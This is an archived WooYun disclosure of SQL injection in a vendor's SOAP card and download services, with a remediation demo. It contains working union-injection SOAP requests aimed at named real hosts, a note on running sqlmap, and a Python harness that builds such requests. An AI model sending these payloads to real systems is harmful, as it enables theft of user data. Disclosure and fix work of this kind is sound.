WooYun (WooYun.org) historical vulnerability search: http://wy.zone.ci/
WooYun Drops articles, online reading: http://drop.zone.ci/
2015-10-27: Details have been sent to the vendor and are awaiting the vendor's handling
2015-10-29: Vendor has confirmed; details disclosed to the vendor only
2015-11-08: Details disclosed to core white hats and experts in the relevant field
2015-11-18: Details disclosed to regular white hats
2015-11-28: Details disclosed to intern white hats
2015-12-13: Details disclosed to the public
Error-based SQL injection is possible.
0x01
POST /cardService.asmx HTTP/1.1
Host: iccardwebservice.kjpt.91huayi.com
Content-Type: text/xml; charset=utf-8
Content-Length: 439
SOAPAction: "http://tempuri.org/GetByUnit"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetByUnit xmlns="http://tempuri.org/">
      <KindID></KindID>
      <UnitName>a*</UnitName>
      <IsLogOut>false</IsLogOut>
      <UnitIDs>2</UnitIDs>
    </GetByUnit>
  </soap:Body>
</soap:Envelope>
The UnitName parameter is injectable (the `*` in the request above marks the injection point for sqlmap).
Millions of user records.
0x02
http://webservice.mbox.91huayi.com/service.asmx?op=GetDownloadCounts
0x03
http://webservice.mbox.91huayi.com/service.asmx?op=GetDownload_counts
0x04
POST /cardService.asmx HTTP/1.1
Host: iccardwebservice.kjpt.91huayi.com
Content-Type: text/xml; charset=utf-8
Content-Length: 444
SOAPAction: "http://tempuri.org/GetByUnitDetail"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetByUnitDetail xmlns="http://tempuri.org/">
      <unitName>' union all select 1,2,3,4,5,6,7,db_name()--</unitName>
      <isCreateCard>1</isCreateCard>
    </GetByUnitDetail>
  </soap:Body>
</soap:Envelope>
0x05
POST /cardService.asmx HTTP/1.1
Host: iccardwebservice.kjpt.91huayi.com
Content-Type: text/xml; charset=utf-8
Content-Length: 409
SOAPAction: "http://tempuri.org/GetOrderListBySId"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOrderListBySId xmlns="http://tempuri.org/">
      <standardId>a' union all select NULL,db_name() --</standardId>
    </GetOrderListBySId>
  </soap:Body>
</soap:Envelope>
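The requests above were built by hand. As an added example that is not part of the original report, the following Python harness builds the same kind of asmx SOAP request with a correct Content-Length and XML-escaped parameter values (so a payload containing `<` or `&` reaches the SQL layer instead of breaking the envelope), generates the union payload for a given column count, and pulls the text nodes out of a response body so an injected probe such as db_name() can be spotted. The host, path and SOAPAction values come from the requests above; the response element names in SAMPLE_RESPONSE are constructed and hypothetical, since the page shows no response body.

```python
import html
import xml.etree.ElementTree as ET

# Taken from the requests above.
HOST = "iccardwebservice.kjpt.91huayi.com"
PATH = "/cardService.asmx"
NS = "http://tempuri.org/"
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"

# Constructed sample response; the element names are hypothetical.
SAMPLE_RESPONSE = (
    f'<soap:Envelope xmlns:soap="{SOAP_NS}"><soap:Body>'
    f'<GetByUnitDetailResponse xmlns="{NS}"><GetByUnitDetailResult>'
    '<Row><Name>iccard</Name></Row>'
    '</GetByUnitDetailResult></GetByUnitDetailResponse>'
    '</soap:Body></soap:Envelope>'
)


def build_soap_request(op, params):
    """Return the raw HTTP/1.1 request (bytes) for one asmx operation.

    Parameter values are XML-escaped (& < >); a single quote needs no
    escaping inside element text, so SQL payloads pass through unchanged.
    """
    inner = "".join(
        f"<{name}>{html.escape(str(value), quote=False)}</{name}>"
        for name, value in params.items()
    )
    body = (
        '<?xml version="1.0" encoding="utf-8"?>'
        f'<soap:Envelope xmlns:soap="{SOAP_NS}"><soap:Body>'
        f'<{op} xmlns="{NS}">{inner}</{op}>'
        '</soap:Body></soap:Envelope>'
    ).encode("utf-8")
    headers = (
        f"POST {PATH} HTTP/1.1\r\n"
        f"Host: {HOST}\r\n"
        "Content-Type: text/xml; charset=utf-8\r\n"
        f"Content-Length: {len(body)}\r\n"
        f'SOAPAction: "{NS}{op}"\r\n'
        "\r\n"
    ).encode("ascii")
    return headers + body


def union_payload(columns, probe="db_name()"):
    """Build the union payload used above for a query with `columns` columns.

    Columns 1..n-1 get numeric fillers, the last one carries the probe.
    Column count is found by trying 1, 2, 3, ... until the error goes away.
    """
    fillers = [str(i) for i in range(1, columns)]
    return "' union all select " + ",".join(fillers + [probe]) + "--"


def extract_result_text(soap_response_xml):
    """Return every non-blank text node under <soap:Body> of a response."""
    root = ET.fromstring(soap_response_xml)
    body = root.find(f"{{{SOAP_NS}}}Body")
    return [el.text for el in body.iter() if el.text and el.text.strip()]


if __name__ == "__main__":
    req = build_soap_request(
        "GetByUnitDetail",
        {"unitName": union_payload(8), "isCreateCard": 1},
    )
    print(req.decode("utf-8"))
    print(extract_result_text(SAMPLE_RESPONSE))
```

The bytes returned by build_soap_request can be written straight to a socket; the Content-Length is computed from the encoded body, which is what the page's hand-written requests had to get right by hand.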
Run it through sqlmap:
Use parameterized queries (bind the SOAP parameters as query parameters instead of concatenating them into the SQL text).
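To show why the fix above closes this bug class, here is an added example (not the vendor's code) in Python on SQLite: the vulnerable lookup splices the SOAP parameter into the SQL text, the fixed one binds it. The units table and its rows are constructed, and sqlite_version() stands in for the db_name() probe used in the payloads above, since this demo runs on SQLite rather than SQL Server.

```python
import sqlite3

# Constructed sample data standing in for the card service's backend; the
# real schema is not shown on the page.
SAMPLE_UNITS = [
    (1, "alpha school", "alice@example.invalid"),
    (2, "beta factory", "bob@example.invalid"),
]

# Same shape as the GetByUnitDetail payload above, sized for this 3-column
# query; sqlite_version() replaces SQL Server's db_name().
UNION_PAYLOAD = "' union all select 1, 2, sqlite_version()--"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE units (id INTEGER, unit_name TEXT, contact TEXT)")
    conn.executemany("INSERT INTO units VALUES (?, ?, ?)", SAMPLE_UNITS)
    return conn


def get_by_unit_vulnerable(conn, unit_name):
    # The bug class on the page: the SOAP parameter is spliced into the SQL
    # text, so a quote in unit_name closes the literal and the rest is SQL.
    sql = ("SELECT id, unit_name, contact FROM units WHERE unit_name = '"
           + unit_name + "'")
    return conn.execute(sql).fetchall()


def get_by_unit_fixed(conn, unit_name):
    # Parameterized: the value travels as a bound parameter, never as SQL
    # text, so the quote and the trailing comment are just characters to match.
    sql = "SELECT id, unit_name, contact FROM units WHERE unit_name = ?"
    return conn.execute(sql, (unit_name,)).fetchall()


def run_demo():
    conn = make_db()
    return {
        "vulnerable": get_by_unit_vulnerable(conn, UNION_PAYLOAD),
        "fixed": get_by_unit_fixed(conn, UNION_PAYLOAD),
        "fixed_legit": get_by_unit_fixed(conn, "alpha school"),
        "version": conn.execute("SELECT sqlite_version()").fetchone()[0],
    }


if __name__ == "__main__":
    r = run_demo()
    print("vulnerable:", r["vulnerable"])  # one row carrying the server version
    print("fixed:", r["fixed"])            # no rows: the payload is data
```

The same change applies to the .NET side of the asmx service: the SqlCommand text keeps a placeholder and the value goes through the command's parameter collection, so the union payload can no longer become part of the statement.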
Severity: Medium
Vulnerability Rank: 10
Confirmation time: 2015-10-29 17:39
Thanks! Submitted to the business department for handling.
None